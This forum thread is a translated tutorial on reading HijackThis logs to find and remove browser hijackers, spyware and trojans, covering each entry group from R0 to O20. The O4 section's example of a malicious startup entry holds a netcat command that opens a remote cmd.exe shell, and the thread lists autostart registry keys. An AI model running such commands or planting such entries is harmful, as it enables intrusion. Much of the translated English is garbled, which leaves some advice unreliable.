Results 1 to 8 of 8

Thread: How to read a HijackThis log?

  1. #1
    Join Date
    May 2008
    Posts
    420

    How to read a HijackThis log?

    I started this book some time, but for personal and above all due to time constraints, I could not finish it in a long time.
    Here goes, I hope that fits all.

    NOTE: This is my first manual, so all criticism is welcome.
    ____________________________________________________________________________________________________ ____________________

    How to read a log Hijackhis?
    Index:

    1. What is HijackThis and what we do?
    2. Install HijackThis and other tools to use.
    3. Moving our Log.
    4. Analyzing logs.
    5. Troubleshooting.
    ____________________________________________________________________________________________________ ____________________

    1. What is HijackThis?

    It is a small tool that allows us to detect and eventually remove the changes made by browser hijackers as "Toolbars, home page, search page, IE captors, etc..."

    It is worth noting that not everything that shows (HijackThis) log in is bad, therefore you must be very careful what you delete the HijackThis log.
    ____________________________________________________________________________________________________ ____________________

    2. Installing and running HijackThis.

    The first thing we must do is download the new version: HijackThis 2.0.2 (or another version, it works well) so you can download: Download.
    Once downloaded and closed all programs running on to the new automated installation not brought earlier.

    We choose the installation path and accept the contract. HijackThis will open automatically and add a shortcut icon on our desktop.
    After this sequence of steps, an image will look like this:

    ____________________________________________________________________________________________________ ____________________

    3. Moving our HijackThis log.

    As we see in the picture above, we can only do one step further;
    Click the button Do a system scan and save a logfile (which roughly means: Scanning your system and save a log file that can be used to publish in any forum or as a backup in another location).

    Well, we hope to implement a system scan and HijackThis will look like this:


    Then we analyze the output.

  2. #2
    Join Date
    May 2008
    Posts
    420

    Re: How to read a HijackThis log?

    When opening the HijackThis you are presented with the screen "QuickStart".

    Note: If the above screen is not displayed, you mark the last box that she is no longer displayed or you are using an older version of HijackThis.

    • Click 'None of the above, just start the program. " You will see the main screen of HijackThis.

    • If you click 'Scan', you see the entries found by HijackThis. The "Scan" is basically a process where the HijackThis log search in more information about the system, such as ActiveX, BHOs and more. If you select the option "Do a system scan only" in the main menu it automatically makes this examination, there is no need to click "Scan."

    • When you select an entry, you can click on "Info on selected item" for the HijackThis give you more information about the selected entry. You can also mark certain entries and then click on "Add checked to Ignorelist" for the HijackThis ignore these entries in the future and not show them in the log.

    • Note that the "Scan" became the "Save Log". By clicking the "Save Log", the HijackThis will save a log file with the information submitted more information to processes that are running. The HijackThis will ask you the name and location to save the file. It is the same as selecting the "Do a system scan and save a logfile" on the main menu, but if you select the button in the main menu automatically saves the HijackThis log in a file called "hijckthis.log" and here he gives the option to choose the location where you want to save the log file.

    • When you check certain entries and click the Fix Checked HijackThis will take different measures depending on the entry. If you click on "Info on selected item" the HijackThis tell you that it will - we will see each type of entry in detail later.

    • The "Info" gives general information of HijackThis, including a brief explanation of each entry and a changelog file (which details the changes that a program received in each version).

  3. #3
    Join Date
    May 2008
    Posts
    420

    Re: How to read a HijackThis log?

    The Settings button

    By clicking the "Config", the screen settings HijackThis appears with four tabs at the top: Main, Ignorelist, Backups, Misc Tools.

    Main

    Main tab you can find various configurations of HijackThis.

    • Mark everything found for fixing after scan - If checked, it means that all items found in HijackThis are marked. Use this option if a log is infected and is much easier to clear some of the entries to mark all options infected.

    • Make backups before fixing items - make backups before repairing any entry. Very useful, it is recommended to leave checked.

    • Confirm fixing & ignoring of items (safe mode) - if unchecked, this option removes the confirmation screen when you fix or ignore any entry.

    • Ignore non-standard but safe domains in IE - a 'white list' that filters entries R1/R0. If unchecked, all items will appear R1/R0, even containing popular fields and marked as safe. This option, when checked, aid the log to be smaller and cleaner.

    • Include list of running processes in logfiles - if unchecked, the HijackThis does not include the list of processes running in the log. The list of processes can be seen in the Task Manager in Windows NT/2000/XP through additional tools in Windows 9x/ME. It is recommended to leave this option checked, as information is never enough.

    • Show Intro frame at startup - if unchecked, this option removes the startup screen, or deselect this option has the same effect that the mark "Do not show this frame again when I start HijackThis" on the Welcome screen. Mark it or not depends only on your preference.

    • Run HijackThis scan at startup and ... - to make this option, the fall in entries HijackThis boot Windows automatically. So it can scan the system to start soon, taking entries that are hidden automatically after a short period of time and could not be included in the log if it is done after the system is completely initialized. This option is generally not very useful, but it is worth to mention it anyway.


    The following options are the standards that when you use HijackThis fix certain items related to Internet Explorer:

    • Default Start Page - the default homepage in the Internet Explorer HijackThis will reset the entries after the homepage. Preference of the user.

    • Default Search Page - a page of search pattern used by Internet Explorer. Because this entry is typically modified by hijackers, the HijackThis needs to fix a value for it. You can set the value used by this option.

    • Default Search Assistant - 'Search Assistant' from Internet Explorer.

    • Default Customize Search - 'Personalization of Search' in Internet Explorer.



    Tab Ignorelist

    Tab 'Ignorelist' you can find the items dropped through the button "Add checked to Ignorelist. It is recommended that you clear this list using the "Delete all" after installing a new version of HijackThis.
    The entries are not removed will be deleted, but removed from the list of items in HijackThis to ignore that these re-appear in the log normally.


    Backups Tab

    If the "Make backups before fixing items" is checked in the tab "Main" (and it is checked by default), the HijackThis creates backups of all items marked. On this screen you can delete individual backups using the "Delete", delete all the items with the "Delete all" or if you want an entry back in place, use the "Restore". Use this screen whenever any program or feature of the system stop working after HijackThis have been used.

  4. #4
    Join Date
    Feb 2008
    Posts
    2,635

    Re: How to read a HijackThis log?

    What should I do before I make a HijackThis log?

    First, we should first ask themselves following steps, before you place your log.


    1. Make sure you all "essential" updates from Microsoft have.

    2. Download and install Hitman Pro 2.2.3
    Hitman Pro is an all in 1 program and very useful for searching for spyware etc.
    Hitman Pro

    3. Installs and twist CoolWWWSearch Smart Killer
    Note: A scan this takes a few seconds. If the hijacker is not on your PC is found, says the mini-scannertje with the message "Smart CoolWWWSearch Killer has not been found on your system"
    Smart Killer

    4. Empty your temporary Internet files.
    Internet Explorer ---> Tools ---> tabbladje "General"
    * Cookies
    * Temporary Internet files (including offline)
    * History

    5. Do at least 1 online virus scan

    6. Restart your computer

  5. #5
    Join Date
    May 2008
    Posts
    420

    Re: How to read a HijackThis log?

    Misc Tools

    One of the best things about the HijackThis is that it has a fairly complete kit for system maintenance. In addition to clear problem areas of the record, it has several additional tools that provide the need to install or download additional tools.

    • Generate Startuplist Log
    • Open Process Manager
    • Open hosts file manager
    • Delete the file on reboot
    • Delete an NT service
    • Open ADS Spy
    • Open Uninstall Manager
    • Advanced Settings
    • Check for Update online
    • HijackThis Uninstall & Exit


    Generate Startuplist Log

    The first button we see this screen is the 'Generate startuplist log'. This button generates a log StartupList program. The Startup List shows all items available for startup programs in Windows, including several areas that are not displayed by HijackThis. Moreover, the Startup List does not give us the option to fix anything found. Both these boxes next to the button cause the log of Startup List is more complete - it is always recommended mark them before making a log of the Startup List.

    Note: The Startup List is a very advanced tool. Being an additional program, the interpretation of logs startuplist will not be included in this document.


    Open Process Manager

    Then we see the "Open Process Manager". By clicking the "Itty Bitty Process Manager" will open. This program is very useful especially in Windows 9x and ME, as the Task Manager is one very simple and does not include programs such as registered processes.
    Although less information that the display manager from the default Windows processes, it allows more than one process is selected (using the keys CTRL and SHIFT) and includes the option "Show DLLs", which creates a new panel which displays a list of all DLLs loaded in process. These DLLs are called modules shown and some trojans are injected as modules in the system processes to run without a process visible in the normal list. This is very rare, so most of the DLLs listed are safe.
    The "Kill Process" ends the (s) Case (s) selected (s). The "Refresh" updates the list of processes and the button "Run" start a program or process the same way as the "New Task" from Task Manager.
    He also has two icons next to the option "Show DLLs" The first (left to right) is the "Copy to clipboard list" to copy the list of files so you can "Paste" it anywhere. The disk icon saves the list to a text file.


    Open hosts file manager

    This is a small program to edit the HOSTS file. After you select it, use the "Open in Notepad" to open the file in Notepad where it is much easier to manage the HOSTS file. As reference, the "Delete line (s)" off the (s) line (s) selected (s) button and the Toggle Line (s) take or place a '#' at the beginning of the line. Read the document on the HOSTS to understand more about it.


    Delete the file on reboot ...

    Probably one of the most simple and useful.
    Windows has a feature called PendingFileRenameOperations that can perform operations with files (such as delete, rename and move) before the system is completely started. This can be used to delete files that Windows always says they are "in use". It is useful to remove trojan horses before they are initialized, without giving chance for them to try to protect.

    After selecting the button, all you need is to select the file to be deleted (or copy & paste the full path of the file) and click 'Open. After that, the HijackThis will ask if you want to restart Windows. In most cases you will want to answer 'No' to manually restart later.
    The Pocket KillBox have more options based on that feature of Windows, including options for the exchange of files, which are more likely to work than operations that only delete the files.


    Delete an NT service

    Several recent trojans are established through the services of Windows NT. Even if an antivirus or anti-spyware remove the file by the service starts, it will still be listed in the administrative tools with the others.
    It is with this tool that HijackThis can delete a service to you. You can use the full name of the service or display the real name of the service. Note that the 'services' are only available on Windows NT/2000/XP.
    For a list of services on your system, click Start -> Run, type services.msc and click OK. Right-click the service you want to delete and click "Properties." You can use both the "Name for display" as the "Service Name" in HijackThis to remove it from the list.
    Note: Take extreme care when using this tool! Unable to retrieve the services after they were removed!


    Open ADS Spy ...

    This is a tool embedded in HijackThis for the management of Alternate Data Streams (ADS). It is available separately on the site Merijn.

    If the Quick Scan option is checked, only the Windows folder will be examined. The option "Ignore safe system info streams' ignores entries ADS generally safe, as the information placed on the tab" Overview "of files. Have the option to calculate MD5 should be used only if you want to develop tools for the removal of a certain type of malware.
    Not all ADS are found malicious. Even if the "Ignore safe system info streams" is checked, the ADS Spy streams can still find safe and streams used by antivirus. Always make a search before you delete any stream. See our paper streams to learn more.


    Open Uninstall Manager

    Many programs, after uninstalled, leave entries in the list in Add / Remove Programs. If this were not enough, several trojans (mostly hijackers) began to include entries in the Add / Remove Programs, supposedly, uninstall them from the system.
    The reality is that often these entries do not work and after you remove the problem manually, they are entries in the list. With this option you can remove them from there.

    To delete an entry you must select the "Delete this entry" and then confirm the action by clicking Yes. The option to 'Edit command' edit the path to the program run by Windows to uninstall the software selected - it is recommended that you not change the commands without having absolute certainty of what is doing.


    Advanced Settings

    After the list of tools, the list HijackThis two advanced options:

    • Calculate MD5 of files if possible
    • Include environment variables in logfile

    The first option places the MD5 of the files to include in the report / log. This is only useful if you know the MD5 hash of the file you want to remove or is developing a tool to remove the files.
    The second option includes the environment variables, such as the location of the Windows folder and the location of the Hosts file - not very useful.


    Check for Update online

    The HijackThis can verify the existence of a new version of HijackThis on servers from SpywareInfo - clicking this button. If you use a proxy to connect, you can define it in the text box below the button.


    HijackThis Uninstall & Exit

    To save all the settings down, HijackThis creates the various keys in the registry. With this button, HijackThis deletes these keys. Note that the file is not removed the HijackThis and the backups are not removed. The Ignore List, on the other hand, is removed.

  6. #6
    Join Date
    May 2008
    Posts
    420

    Re: How to read a HijackThis log?

    4. Analyzing the log of HijackThis.

    I shall detail the components that make up the HijackThis log and then explain briefly.
    These are:

    R0, R1, R2, R3: the Start Page URL / search in Internet Explorer.

    F0, F1, F2, F3: Programs are loaded from *. ini files (system.ini, win.ini)

    N1, N2, N3, N4: The URL of homepage / search for Firefox or Netscape.

    O1: Redirects by notice in the file HOSTS.

    O2 BHO (Browser Helper Object), are plugins to increase functionality of the Internet, but can also be spyware.

    O3: IE Toolbars. (Internet Explorer).

    O4: Applications that load automatically at startup of Windows, either from the register or from the Startup folder.

    O5: IE options are not visible from the Windows Control Panel.

    O6: Restricted by the Administrator to the options of IE.

    O7: Restricted by the Administrator to the Register.

    O8: Items found in the context menu of IE.

    O9: Additional buttons are located on the IE toolbar. Eg Flasget, DAP, Encarta, and so on.

    O10: Winsock Hijackers.

    O11: Adding an extra group in the advanced options of IE.

    O12: Plugins for IE.

    Ö 13: IE Hijack prefix.

    O14: Hijack of default from IE.

    O15: Sites not allowed in the safe area set by IE.

    O16: ActiveX Objects.

    O17: Hijack Dominion / Lop.com

    O18: Protocols extra / Hijack them.

    O19: Hijack the stylesheet User

    O20: Values self-extracting AppInit_DLLs registry.

    O21: Keys registry ShellServiceObjectDelayLoad self-extracting.

    O22: Keys registry SharedTaskSheduler self-extracting.

    O23: Services.

    Here are detailed each component. Now we will see how we can correct any problems after reading these indicators.

  7. #7
    Join Date
    May 2008
    Posts
    420

    Re: How to read a HijackThis log?

    5. Troubleshooting of the system with HijackThis.

    Group R0, R1, R2, R3.

    In this case, if the URLs listed here have been configured for us there will be no problem and left as it is.
    But if these have not been put to us, directions are not very extensive and we know the brand and we Fix Checked.

    Good Example:
    Code:
    R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page=www.google.com
    Bad Example:
    Code:
    R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar=res://C:\WINDOWS\TEMP\se.dll/sp.html
    NOTE: R2 is no longer used.

    Continuing R3:
    R3 is the reference used by Search Hook. If you manually enter a URL as a homepage without a protocol (http://, ftp://) You try to find a machine and if you do not succeed, go to URL Search Hook.

    Good Example:
    R3 - Default URLSearchHook is missing

    Bad Example, and to mark 'Fix Checked'
    Code:
    R3 - URLSearchHook:(no name)-_(CFBFAE00-17A6-11D0-99CB-00C04FD64497)-(no file)
    ____________________________________________________________________________________________________ ____________________

    Group F0, F1, F2, F3.
    Here programs are loaded from files *. ini (win.ini, system.ini).

    F0: According to the sources that I consulted recommended that if there is a line that starts with F0, mark it and give then Fix Checked.

    F1: Programs used by ancient Win 3.1/95/98 which is attached in the win.ini file in the keys Run = and Load =. In this case we must search for information before dialing and giving Fix Checked.

    F2 and F3: They are the same as above, but use the NT kernel, I'm talking about Windows NT/2000/XP, not using the same way to the startup files: system.ini and win.ini already named above.

    Some examples of reference:
    Code:
    HKLM\Software\Microsoft\Windows NT\CurrentVersion\IniFileMapping 
    HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
    Code:
    HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit=[**]\system32\userinit.exe,[**]\moralla.exe

    If, under Win NT is the default: userinit, nddeagnt.exe is normal under that system. But any other executable is highly likely to be spyware and / or trojan.
    ____________________________________________________________________________________________________ ____________________

    Group N1, N2, N3, N4.

    URL's home page / search in Netscape / Mozilla.

    N1: This refers to the home page and search engine Netscape 4
    N2: It refers to the home page and search engine netscape 6
    N3: Refers to the home page and search engine Netscape 7.
    N4: Corresponds to the home page and search engine of Mozilla Firefox.

    Are commonly found in the files: prefs.js.

    NOTE:
    Currently, the highest percentage of Spyware, Malware, Hijackers are made for IE and not Mozilla, Netscape or Opera, and they remain a bit more unless the IE above.
    ____________________________________________________________________________________________________ ____________________

    O1 group:
    Corresponds to the funnel of the Hosts file.

    What is the Hosts file?.
    The Hosts file, it works as a kind of converter or responsible for establishing the relationship between IP address and hostname.

    127.0.0.1 www.google.com

    If you try to go to www.google.com, reviewed the hosts file, you will see the entry and make the IP address 127.0.0.1.
    In this box, you'll see the default installation paths Hosts file:


    If you see entries like those shown above and there is no specific reason for what you know should be there, you can safely delete.

    If you see the hosts file is located in C:\Windows\Help\hosts, that means you're infected with CoolWebSearch. If you noticed that the hosts file is not in default path for your operating system then, in the HijackThis scan, the entrance and give Fix Checked or another program to clean up the Hosts file.

    If you're not a very advanced user and do not want complicate HijackThis, you can use the host program, which allows you to restore the hosts file to its default configuration on your system.

    To do this, download the host program from here: Download Host. Run, once open, click the button "Restore Original Host" and once this is done close the host.
    ____________________________________________________________________________________________________ ____________________

    O2 Group:
    This group belongs to the Browser Helper Objects (BHO, Translation, Google).

    Real example of BHO:
    Code:
    BHO: NAV Helper- -C:\Program Files\Norton AntiVirus\NavShExt.dll
    To fix these types of entries, we can see a list like this, hosted by Sysinfo. Can be found here: http://sysinfo.org/bholist.php

    When we consult the list, we must emphasize the CLSID, which is between the number keys on the list. The CLSID in the list refer to log entries that contain information about the BHO.

    Once detected malignant entries shall mark and give it "Fix Checked". But then HijackThis will want to close them instantly and you can not do so, and that will be in use.

    In this case what we should do is go into safe mode by pressing F8 before you start your system and delete it manually.
    ____________________________________________________________________________________________________ ____________________

    Group O3:
    This group corresponds to the toolbars of Internet Explorer.
    These are the famous "Toolbars", which is located below the navigation bar or the context menu of IE.

    They are in the following registry key:
    Code:
    HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar
    Example:
    Code:
    Toolbar: Norton AntiVirus - - C:\Program Files\Norton AntiVirus\NavShExt.dll
    If these entries are not accepted by you, or do not recognize their names you can consult the list of Sysinfo that is in the former group, to find the entry and see if your system is in or not. If you do not want something on your system, you can delete it with ease, as we did before: Marking the entry and click Fix Checked.

    In this group, it is the same as in the previous group. HijackThis will attempt to delete the selected entries but will not be possible to delete some, you have to go into safe mode to delete them manually.
    ____________________________________________________________________________________________________ ____________________

    O4 Group:
    In this group, it is up to the programs or applications that start when Windows on our system.
    Commonly found in the registry keys and the Startup folders. This is only valid for NT, XP and 2000.

    - The keys of the registry, which can accommodate these applications are these:

    Code:
    HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce 
    HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce 
    HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices 
    HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices 
    HKLM\Software\Microsoft\Windows\CurrentVersion\Run 
    HKCU\Software\Microsoft\Windows\CurrentVersion\Run 
    HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce 
    HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 
    HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx 
    HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 
    HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 
    HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
    NOTE: HKLM = HKEY_LOCAL_MACHINE-HKCU=HKEY_CURRENT_USER.

    There are two folders where you can start the applications:

    Startup: C:\Documents and Settings\USERNAME\Start Menu\Programs\Startup -> particular user.
    Global: C:\Documents and Settings\All Users\Start Menu\Programs\Startup -> points to all users.

    When fixing the O4 entries, HijackThis not delete the files associated with this entry. You must manually delete them, usually by rebooting the machine into safe mode. Tickets Global Startup Startup and work a little differently. HijackThis deletes the shortcuts in these posts, but not the files they point to. If the executable resides in the current directory or Global Startup Startup time will be deleted.

    Example of legitimate application:
    Code:
    HKLM\ ... \Run:[Winamp]"C:\Winamp\winamp.exe"/(can be any argument)
    Possible malicious application example:
    Code:
    HKLM\...\Run:[**]210.xxx nc-vv-e cmd.exe "
    You can see some of these lists of legitimate Startups to check your log and see if the applications that start with your system or are true in a worse case: Trojans, spyware or hijackers.
    These lists can serve you:
    http://www.answersthatwork.com/Taskl...s/tasklist.htm
    http://greatis.com/regrun3appdatabase.htm
    http://www.sysinfo.org/startuplist.php
    ____________________________________________________________________________________________________ ____________________

    O5 Group:
    This group is not able to access the IE settings from the Control Panel.
    Adding an entry in the file Control.ini, which by default should be found in "C:\Windows\Control.ini. Modifying this file, we can specify the control panels that do not want to be visible.

    Example: File: Control.ini: inet.cpl = no. It hides the options of IE in the Control Panel.

    If you log in, find a line like this and not putting yourself or another person you trust or managed by the system, is a sign that a malicious application is trying to block or impede the modification of the options for IE. It may also be restrictions placed by some Anti-Spyware software such as SpyBot or Adware in the latter case you can leave with peace of mind, otherwise you can use HijackThis to fix it.
    ____________________________________________________________________________________________________ ____________________

    O6 Group:
    This section corresponds to a restriction by the administrator to make changes in settings or on the homepage of Internet Explorer through certain settings in the registry.

    Example: --
    Code:
    HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions
    These options are only blocked if the administrator has done or casual personal use or function is activated to block IE from the options panel "Immunize" antispyware software SpyBot: Search & Destroy.
    ____________________________________________________________________________________________________ ____________________

    Group 07:
    This section corresponds to the Regedit can not be executed due to the change of an entry in the register.

    Registration Key:
    Code:
    HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System
    Sample List O7 --
    Code:
    HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System:
    DisableRegedit=1
    NOTE: In some cases, administrators of certain places, such as cyber, businesses or other sites to block access to regedit does not change any settings. But to see this in your system and was not for you, you can use HijackThis to delete it with ease.
    ____________________________________________________________________________________________________ ____________________

    Group 08:
    This group is for the extras found objects from the context menu of Internet Explorer.

    This means that you'll see the options you normally see when you right-click on any web page you're viewing on your browser.
    Code:
    Registry key: HKEY_CURRENT_USER\Software\Microsoft\Internet
    Explorer\MenuExt

    Sample List O8 --
    Code:
    Extra context menu item: & Google Search -- 
    res://c:\windows\GoogleToolbar1.dll/cmsearch.html
    The listing for these entries show the objects that appear in the contextual menu when you right click, and what program is used when you click on that option. Some, like "Browser Pal" should always be erased, and the rest should be on Google before doing anything. An example of a legitimate program that we could find there would be Google Toolbar.

    When you fix these entries, HijackThis not delete the files that are mentioned in the list. It is recommended that you restart in safe mode as in previous cases and delete these files and / or folders from the toolbar above.
    ____________________________________________________________________________________________________ ____________________

    Group 09:
    This group corresponds to the buttons we have in the main toolbar of IE or the objects (items) on the Tools menu in IE that are not part of the default installation.

    Code:
    Registry Key:HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions
    Sample Schedule O9 --
    Code:
    Extra Button: AIM (HKLM)
    If you do not need these buttons or menu items or recognized as malwares, you can fix them securely.

    The same happens in the previous groups, HijackThis can not delete the files mentioned here, but what you have to reboot and enter safe mode to manually delete the folders and / or malicious files.
    ____________________________________________________________________________________________________ ____________________

    Group 10:
    This group corresponds to the Winsock Hijackers, also known as LSP (Layered Service Provider). The LSPs are a way to connect your software to implement a Winsock 2 on your computer. Since the LSPs are chained when the Winsock is used, the data are transported via each LSP in the chain. The spyware and hijackers may use LSPs to see all the traffic that is generated on your Internet connection.

    Be careful, when removing these objects, and which if disposed of improperly, you could lose access to the Internet.

    Sample Schedule O10 --
    Code:
    Broken Internet access because of LSP provider 'spsublsp.dll' missing
    Many virus scanners begin scanning viruses, trojans, etc.., At the Winsock. The problem is that many do not reorder the LSPs in the correct order after deleting the problematic LSP. This may cause a problem and see HijackThis display a warning, which may be similar to the example above, although the Internet is still working. You should consult an expert when you fix these errors. You can also use LSPFix fix.

    The SpyBot usually can fix it but make sure you have the latest version, as the old problems.

    If you're not a very advanced user with a tool you can use HijackThis to fix these errors call LSPFix (Download).
    ____________________________________________________________________________________________________ ____________________

    Group 11:
    This group is a group of non-default options that have been added in the Advanced tab of Internet Options in Internet Explorer.

    If you search for the tools menu>> Internet Options you will see the Advanced tab. You may see there a new set of options by adding an entry under a registry key.

    Code:
    Registry Key:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions
    Sample Schedule O11 --
    Code:
    Options group: [CommonName] CommonName
    We pulled out the manual I read, I quote: "According to Merijn, the creator of HijackThis (and also CWShredder, StartupList, etc..) Only knows of the existence of a hijacker who uses it and is CommonName. If CommonName look at the list, you can safely remove it. If you see another entrance you should use Google to research a little. "
    ____________________________________________________________________________________________________ ____________________

    Group 12:
    This group corresponds to the Plug-ins or addons for Internet Explorer. Plug-ins or addons are pieces of software that is loaded when Internet Explorer starts, to add functionality to the browser. There are many legitimate plug-ins available and also illegitimate as the display of PDF files (legitimate).

    Code:
    Registry key:HKEY_LOCAL_MACHINE\software\microsoft\internet explorer\plugins
    Code:
    Sample Schedule 012: Plugin for.PDF: C:\Program Files\Internet Explorer\PLUGINS\nppdf32.dll
    Many of the plug-ins are legitimate, so you should investigate Google, before finding erased.

    One of the most popular plug-ins is the illegitimate Onflow, which has a. OFB.

    When you fix these entries with HijackThis, HijackThis will want to delete the file list. Sometimes the file may be in use even if Internet Explorer is closed. Yes, the file still is not removed, you must enter in safe mode and remove it manually.
    ____________________________________________________________________________________________________ ____________________

    Group 13:
    This group corresponds to a prefix of the hijacker's default Internet Explorer. The prefix is a default setting in Windows that specifies how URLs that you type without pretend http://, ftp://, etc. they are managed. By default Windows add http:// at the beginning, as the default prefix. You can change this prefix by default one of your choice by editing the registry. The hijacker known as CoolWebSearch do this by changing the default prefix http://ehttp.cc/?. That means that when you connect to a URL, www.google.com, actually going to http://ehttp.cc/?www.google.com, which is actually the website for CoolWebSearch .

    Code:
    Registration Key: 
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\DefaultPrefix\
    Code:
    Sample List 013 - WWW. Prefix:http://ehttp.cc/?
    If you are experiencing problems similar to the problem above, you should run CWShredder. This program removes all known variations of CoolWebSearch that may be in your machine.

    If CWShredder does not find or fix the problem, then you can use HijackThis to fix this entry if found.
    ____________________________________________________________________________________________________ ____________________

    Group 014
    This group is for the hijacker of the "Reset Web Settings" (the Reset Web Settings). There is a file on your computer using IE (Internet Explorer) when you reset the options that came by default. This file is saved by default in C:\Windows\inf\iereset.inf and contains all the default settings to be used. When you reset a configuration file to read and change the settings that are in the file. If a hijacker changes the information in that file, then you'll be reset when re-configurations, for reading the information incorrectly iereset.inf file.

    Code:
    Sample List 014 - IERESET.INF:START_PAGE_URL=http://www.searchalot.com
    In conclusion, if you see such an entry in your log, does not always mean it is bad. Can be made for you, a computer administrator, you must stop if and when, you know the address of the file. Conversely, if the unknown, you can mark it and give Fix Checked.
    ____________________________________________________________________________________________________ ____________________

    Group O15.
    This group corresponds to unwanted sites in the trusted sites zone of IE. The security of Internet Explorer is based on a number of areas. Each zone has a different level of security in terms of scripts and applications that can run while you are using that area. You can add domains to particular areas, so if you're navigating in a domain that is part of an area of low security, then allow to run scripts, some potentially dangerous, in a website.

    Code:
    Registry key:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains
    Code:
    Sample List O15 - Trusted Zone: http://www.arwinianos.net
    So if we know any input source or your URL, we will mark it and give Fix Checked.
    ____________________________________________________________________________________________________ ____________________

    Group O16.
    This group is for ActiveX objects, also known as "Downloaded Program Files (Downloaded Program Files).

    ActiveX objects are programs that are downloaded from websites are stored on your computer. These objects are stored by default in: C: \ windows \ Downloaded Program Files. They have a reference in the registration for its CLSID which is a long string of numbers in braces (). There are many legitimate ActiveX controls such as this example, which is an iPIX viewer.

    Code:
    Sample List O16 - DPF: (iPIX ActiveX Control) - http://www.ipix.com/download/ipixx.cab
    Activex or for playing a game online.
    Many are legitimate, but so are to be used with other intentions.

    If you see names or addresses that do not recognize, you should search Google to see whether they are legitimate. If you confirm that they are illegitimate, you can fix them. Removing ActiveX objects on your computer, you will not have big problem to download it again when you enter back into the site where the downloads.
    As we said above, not all Activex, are illegitimate. Many of these are used by authorized websites that allow access to certain functions that are not permitted without the ActiveX object.

    For example:
    Any AV online as Eset, Kaspersky need to run an Activex and view the contents of your files so that we can analyze.

    When you fix these entries with HijackThis, HijackThis will want to delete the file list. Sometimes the file may be in use even if Internet Explorer is closed. Yes, the file still is not removed, you must enter in safe mode and remove it manually.
    ____________________________________________________________________________________________________ ____________________

    Group O17.
    This group is for the domain Lop.com.

    When we turn to a website using a domain such as www.hotmail.com, instead of an IP address, your computer uses a DNS server to translate domain name into an IP address like 200.56.15.85. The domain hack happens when the hijacker changes the DNS servers on your machine to be able to point your DNS to where they want to be able dirijirte anywhere they want. Adding www.hotmail.com their DNS servers, they can do that when you go to www.hotmail.com, you redirect to the site of your choice, for example, a site to download more malware to your computer or infect you with a trojan .

    Code:
    Sample List O17 - HKLM\System\CS1\Services\VxD\MSTCP:NameServer=69.57.146.14,69.57.147.175
    If you see entries of this type and do not recognize the domain belonging to your ISP or company that gives you Internet access, and DNS servers do not belong to your ISP or company, then you should use HijackThis to fix this.

    Otherwise, you could do a Whois on the IP address to see which company they belong.
    ____________________________________________________________________________________________________ ____________________

    Group O18.
    This group is for the extra protocols and protocol hijackers.

    This method is used to change the standard protocol drivers that your computer uses to provide the hijacker. This allows the hijacker to take control of certain channels on your computer sends and receives information.

    Code:
    Registry Keys: 
    HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\ 
    HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID 
    HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler 
    HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Filter
    HijackThis first read the register of protocols for non-standard protocols. When a sample is the CLSID for more information and the file path.

    Code:
    Sample List O18 - Protocol: relatedlinks - - C:\PROGRA~1\COMMON~1\MSIETS\msielink.dll
    Most who do this are common CoolWebSearch, Related Links, and Lop.com. If you see these names you can fix it using HijackThis.
    Use Google to see if the files are legitimate. You can also use the List of O18 CASTLECOPS support to verify the files.

    When you fix these entries with HijackThis, HijackThis will want to delete the file list. Sometimes the file may be in use even if Internet Explorer is closed. Yes, the file still is not removed, you must enter in safe mode and remove it manually.
    ____________________________________________________________________________________________________ ____________________

    Group O19.
    This group is for the hijacker of the user's style sheets.

    A stylesheet is a template for how to display the layers, colors and fonts that are displayed in an HTML page. This type of hijacking overrides the default style sheet, which was designed to help users, and causes large amounts of pop-ups (advertising pop-ups) or SPAM to cause, annoyance or a slow potential.

    Code:
    Keys in the registry: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Styles\:User Stylesheets
    Code:
    Sample List O19 - User style sheet: c:\WINDOWS\Java\my.css
    In general, these entries can be repaired without major problems with HijackThis.

    When you fix these entries with HijackThis, HijackThis will want to delete the file list. Sometimes the file may be in use even if Internet Explorer is closed. Yes, the file still is not removed, you must enter in safe mode and remove it manually.
    ____________________________________________________________________________________________________ ____________________

    Group O20.
    This group is for files that are loaded via the AppInit_DLLs registry value.

    AppInitDLLs the registry value contains a list of dlls (libraries) to be loaded when it is loading user32.dll. Many Windows executables use the user32.dll library, which means that any DLL that is listed in the AppInit_DLLs registry key will also be charged. This makes it very difficult to remove because the DLL is loaded with many processes, many of which can not be stopped without causing system instability. User32.dll file is also used in processes that start automatically by the system when you logueas. This means that the files loaded in the AppInit_DLLs value will be loaded near the beginning in the Windows startup routine allowing the DLL to hide or protect itself before we have access to the system.

    This method is known to be used by a variant of CoolWebSearch and can only be seen in Regedit by right clicking on the value and selecting Modify binary data. Registrar Lite, on the other hand, can more easily see this DLL.

    Code:
    Registry key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows
    Code:
    Sample List O20 - AppInit_DLLs: C:\WINDOWS\System32\winifhi.dll
